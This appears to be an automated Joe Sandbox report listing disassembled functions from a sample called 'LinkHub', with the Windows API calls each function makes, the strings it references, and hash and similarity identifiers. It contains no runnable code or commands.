Instruction ID: 8736d3a8f5181864fe7059ae6311add624a646273fdd535de93d54b518f62210
Opcode Fuzzy Hash: 9cf2a0e9e0125f7622eb1b4f755af575a746c5f5fc0486d54818d0bfd84a53a8
Instruction Fuzzy Hash: 23E0E577008105BBDB011FA2EE0D90ABF39FF49322B904222F22593074CF329420DB55

Function 00B6CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B041EA: _wcslen.LIBCMT ref: 00B041EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B6CF99
_wcslen.LIBCMT ref: 00B6CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B6D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B6D075

Strings

0, xrefs: 00B6CF5A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 79f18b18e5a371a3143521065a2e6865cc2276b61a7d0cdc0baa4ddb375b5d95
Instruction ID: 2d776879c968435bfc810f6459c5784685813e6bd01f6057391e7b37ab7d9a1c
Opcode Fuzzy Hash: 79f18b18e5a371a3143521065a2e6865cc2276b61a7d0cdc0baa4ddb375b5d95
Instruction Fuzzy Hash: 5851F071B143009BD710AF28D895B7BBBE8EF59314F080AAAF995D3291DB78CD058752

Function 00B8B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00B8B903

Part of subcall function 00B041EA: _wcslen.LIBCMT ref: 00B041EF

GetProcessId.KERNEL32(00000000), ref: 00B8B998
CloseHandle.KERNEL32(00000000), ref: 00B8B9C7

Strings

@, xrefs: 00B8B8D2
<, xrefs: 00B8B8CB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: cd929aec8978a468c2fc01bad2a3ecc22550f82aaaebc8c98322184c08af300a
Instruction ID: 079ad52aaf21793e883ebe57744d3a6a992f94c48c340b89858f789edea0d60a
Opcode Fuzzy Hash: cd929aec8978a468c2fc01bad2a3ecc22550f82aaaebc8c98322184c08af300a
Instruction Fuzzy Hash: 8F715875A00615DFCB10EF64C495A9EBBF5FF08310F048499E856AB3A2CB74EE45CB90

Function 00B67B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B67B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B67BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B67BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B67C36

Strings

DllGetClassObject, xrefs: 00B67BA9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 6b5c6ce9c2b053f9136f769082bf90d3479848a78420e7c7b384d22a3db264c1
Instruction ID: 2d170ac30590785eed2ad576865b4899a910ff98ac5bb2cd93e74a5b0e66d9ea
Opcode Fuzzy Hash: 6b5c6ce9c2b053f9136f769082bf90d3479848a78420e7c7b384d22a3db264c1
Instruction Fuzzy Hash: 9141BFB2644204EFDB15CF24D984A9A7BF9EF44318F1480E9A9069F209DBB9DD44CBA0

Function 00B94818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B948D1
IsMenu.USER32(?), ref: 00B948E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B9492E
DrawMenuBar.USER32 ref: 00B94941

Strings

0, xrefs: 00B94825

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 1e8928aa404a47c83915fd7320a26cb3ffbdeb4de8bbe86b1321f860000ff08d
Instruction ID: c90d54e1eae3e35f59a86c4067e96d8214af5a0f86de55cdfd01afc21e69a618
Opcode Fuzzy Hash: 1e8928aa404a47c83915fd7320a26cb3ffbdeb4de8bbe86b1321f860000ff08d
Instruction Fuzzy Hash: 06415B75A01249EFDF10CF61D884EAABBF9FF16324F0441A9E946A7250D734ED46CB60

Function 00B6272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B627B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B627C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B627F6

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

Strings

ListBox, xrefs: 00B62772
ComboBox, xrefs: 00B6273D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 46bd301d626712480088273860bfd681f9cfad281ee189245a338c3bb28f7027
Instruction ID: cdf89e9b85f3ac0f4a5cb3f96dda77f403465e3c795402d28497f50e4c387f19
Opcode Fuzzy Hash: 46bd301d626712480088273860bfd681f9cfad281ee189245a338c3bb28f7027
Instruction Fuzzy Hash: 0721D371900104BEEB05ABA4DC86DFEBBF8DF453A0B1041A9F422A71E1CF384D0A9A60

Function 00B939B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B93A29
LoadLibraryW.KERNEL32(?), ref: 00B93A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B93A45
DestroyWindow.USER32(?), ref: 00B93A4D

Strings

SysAnimate32, xrefs: 00B93A04

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: be00b92dcc6c61a31857ee7fdb12cc3f2fdaf9c9d983cd082b042d098ef12692
Instruction ID: 5f6f54b98e746d269d8051f70c5409696b03912abb4568b572e0066ec2b4d5c8
Opcode Fuzzy Hash: be00b92dcc6c61a31857ee7fdb12cc3f2fdaf9c9d983cd082b042d098ef12692
Instruction Fuzzy Hash: CE21AC71600209ABEF108F64DC80FBF77E9EB49B68F109269FA92961E0C771CD409B60

Function 00B250DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B2508E,00000003,?,00B2502E,00000003,00BC98D8,0000000C,00B25185,00000003,00000002), ref: 00B250FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B25110
FreeLibrary.KERNEL32(00000000,?,?,?,00B2508E,00000003,?,00B2502E,00000003,00BC98D8,0000000C,00B25185,00000003,00000002,00000000), ref: 00B25133

Strings

CorExitProcess, xrefs: 00B25108
mscoree.dll, xrefs: 00B250F6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0183b58dd8edc3d19d1b4a89dbf68a84479a3acddca84a1842558e436a16de36
Instruction ID: 9815da083a506b453183becb0d0ab4ae5337be3372ae6667879ae5e72659d905
Opcode Fuzzy Hash: 0183b58dd8edc3d19d1b4a89dbf68a84479a3acddca84a1842558e436a16de36
Instruction Fuzzy Hash: 7FF04F35A00228BBDB119F99ED49BADBBF4EF08752F0000A9F809A3161DF749E50CA95

Function 00B0663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B0668B,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B0664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B0665C
FreeLibrary.KERNEL32(00000000,?,?,00B0668B,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B0666E

Strings

kernel32.dll, xrefs: 00B06642
Wow64DisableWow64FsRedirection, xrefs: 00B06656

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 3578521e2569b9ce61f0b18bd8a1c84c96fa8a12aafb797dadd24083a1d90f49
Instruction ID: c8b12e614bff997276efd8c076e76b03ce2cf5e07cd868421213962891daca70
Opcode Fuzzy Hash: 3578521e2569b9ce61f0b18bd8a1c84c96fa8a12aafb797dadd24083a1d90f49
Instruction Fuzzy Hash: F0E0863660153217D2111726BC08B9A6AE8DF92B12B060156F804F3154DF60CD0180A4

Function 00B06607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B45657,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B06610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B06622
FreeLibrary.KERNEL32(00000000,?,?,00B45657,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B06635

Strings

Wow64RevertWow64FsRedirection, xrefs: 00B0661C
kernel32.dll, xrefs: 00B06609

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 19040e2c6b8cf7f301bdb8233c911c4d75a7d06a45f36d2da74a91f19d6548a3
Instruction ID: fd7f252a51a58d3ba07fd9b395af52118ee930c5baa6416b3396d6415f0b6a86
Opcode Fuzzy Hash: 19040e2c6b8cf7f301bdb8233c911c4d75a7d06a45f36d2da74a91f19d6548a3
Instruction Fuzzy Hash: 76D0123661253157862227267D18BCE6FA4EE91B1130600A6B804B3164CF61CD11C598

Function 00B73306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B735C4
DeleteFileW.KERNEL32(?), ref: 00B73646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B7365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B7366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B7367F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: bbd3521d0b90be6c1f6b4ed6b46b74a45080ddc7242ec1546cf7a5afc2e63681
Instruction ID: 948444283622ae648292b26a2fd0a0d674a7e9dc8296e6cc208ade37fcf40b0f
Opcode Fuzzy Hash: bbd3521d0b90be6c1f6b4ed6b46b74a45080ddc7242ec1546cf7a5afc2e63681
Instruction Fuzzy Hash: 78B15DB2A00129ABDF15DBA4CC85EDEBBFDEF48710F0080E6F51DA7151EA309B449B61

Function 00B8ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00B8AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B8AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B8AEC8
CloseHandle.KERNEL32(?), ref: 00B8B09D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 5dbf01d85fe3b0d1ca5ff151af1dc540c077d178b1ed64e91d96150ea00f955e
Instruction ID: c76cbafd0a2b4ef5fe48bc2ebadfdedc7a29ee6bb912a3034c37e8018ca2a974
Opcode Fuzzy Hash: 5dbf01d85fe3b0d1ca5ff151af1dc540c077d178b1ed64e91d96150ea00f955e
Instruction Fuzzy Hash: 14A15071A043019FE720EF24D886F2AB7E5EB44714F54889DF5A99B2D2DB71EC41CB81

Function 00B8C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8C10E,?,?), ref: 00B8D415
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D451
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4C8
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B8C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B8C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B8C5C3
RegCloseKey.ADVAPI32(?,?), ref: 00B8C606
RegCloseKey.ADVAPI32(00000000), ref: 00B8C613

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 98861c27094e412398930a10d24576c10bd3ff5f9f0f28b78b682b20aecf8e3d
Instruction ID: a32cdc99b285910982f450ba6fbbe226bb81adb70587a450b74fdbc3400c28ef
Opcode Fuzzy Hash: 98861c27094e412398930a10d24576c10bd3ff5f9f0f28b78b682b20aecf8e3d
Instruction Fuzzy Hash: A1618371108241AFD714EF14C491E6ABBE5FF84308F5485ADF4998B2A2DB31ED46CBA1

Function 00B6ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B6D7CD,?), ref: 00B6E714

Part of subcall function 00B6E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B6D7CD,?), ref: 00B6E72D

Part of subcall function 00B6EAB0: GetFileAttributesW.KERNEL32(?,00B6D840), ref: 00B6EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00B6ED8A
MoveFileW.KERNEL32(?,?), ref: 00B6EDC3
_wcslen.LIBCMT ref: 00B6EF02
_wcslen.LIBCMT ref: 00B6EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B6EF67

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: c1f38b7f068c5d851cefc0808ef525f9c3a2a97c5445fa6e5ffac686364fc591
Instruction ID: 9684d69b8835bfd39dbe18ca6ab7f6b2203bdc5cb6ed56d032345c7942dc5b93
Opcode Fuzzy Hash: c1f38b7f068c5d851cefc0808ef525f9c3a2a97c5445fa6e5ffac686364fc591
Instruction Fuzzy Hash: 385171B24083859BC724EB94D881DDBB3ECEF84300F40096EF299D3191EF75E6888756

Function 00B69517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B69534
VariantClear.OLEAUT32 ref: 00B695A5
VariantClear.OLEAUT32 ref: 00B69604
VariantClear.OLEAUT32(?), ref: 00B69677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B696A2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: b45946a00069e7c41cf132c3309677f9217185fda234bf2940e1df435134a6b6
Instruction ID: 66e485e55770998c454d86f1031257e1112439512195bebdc74675d32896fded
Opcode Fuzzy Hash: b45946a00069e7c41cf132c3309677f9217185fda234bf2940e1df435134a6b6
Instruction Fuzzy Hash: E65148B5A00219EFCB14CF68C884EAAB7F8FF89310B158559E90ADB314E734E911CF90

Function 00B79540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B795F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B7961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B79677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B7969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B796A4

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: f18f0146113d3b993f8e0a7e453efd6d1bb694619c3441db074739b28bef378e
Instruction ID: 2f6a34bb9bf030e4f72c51a0e392384db588bcb32f49ff3a493cc3fc124782dc
Opcode Fuzzy Hash: f18f0146113d3b993f8e0a7e453efd6d1bb694619c3441db074739b28bef378e
Instruction Fuzzy Hash: E5511A35A00619DFCB05DF65C981A6ABBF5FF48354F088099E859AB3A2CB35ED41CB90

Function 00B89941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B8999D
GetProcAddress.KERNEL32(00000000,?), ref: 00B89A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B89A49
GetProcAddress.KERNEL32(00000000,?), ref: 00B89A8F
FreeLibrary.KERNEL32(00000000), ref: 00B89AAF

Part of subcall function 00B1F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B71A02,?,753CE610), ref: 00B1F9F1
Part of subcall function 00B1F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B60354,00000000,00000000,?,?,00B71A02,?,753CE610,?,00B60354), ref: 00B1FA18

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

